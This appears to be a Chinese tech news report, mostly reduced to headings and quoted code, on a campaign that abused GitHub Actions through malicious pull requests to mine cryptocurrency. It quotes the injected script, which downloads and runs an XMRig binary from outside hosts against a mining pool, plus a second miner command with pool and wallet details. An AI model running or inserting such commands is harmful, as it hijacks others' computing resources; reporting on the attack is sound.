梦晨 晓查 发自 凹非寺
量子位 报道 | 公众号 QbitAI
PR异常让程序员起疑心
尝试“作死”运行
apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null
$ objdump -s --section .comment prog
prog: file format elf64-x86-64
Contents of section .comment:
0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.
0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1
0020 20323032 30313230 3300 20201203.
$ ./prog --version
XMRig 6.8.1
built on Feb 3 2021 with GCC 10.2.1
features: 64-bit AES
libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0
可以防范但很难根除
攻击还在继续
npm.exe --algorithm argon2id_chukwa2
--pool turtlecoin.herominers.com:10380
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
--password xo
△同一黑客账号至少攻击了95个GitHub仓库
[1]https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/
[2]https://dev.to/thibaultduponchelle/the-github-action-mining-attack-through-pull-request-2lmc
[3]https://blog.aquasec.com/container-security-alert-campaign-abusing-github-dockerhub-travis-ci-circle-ci
[4]https://twitter.com/JustinPerdok
[5]https://bugs.chromium.org/p/project-zero/issues/detail?id=2070
往期推荐
曝光!某银行软件开发中心拖欠工资,招聘套路深!防不胜伤!!
绝了!这款工具让 Spring Boot 不在需要 Controller、Service、DAO、Mapper 了
雷军写代码水平如何?
直面Java第343期:为什么TOMCAT要破坏双亲委派
深入并发第013期:拓展synchronized——锁优化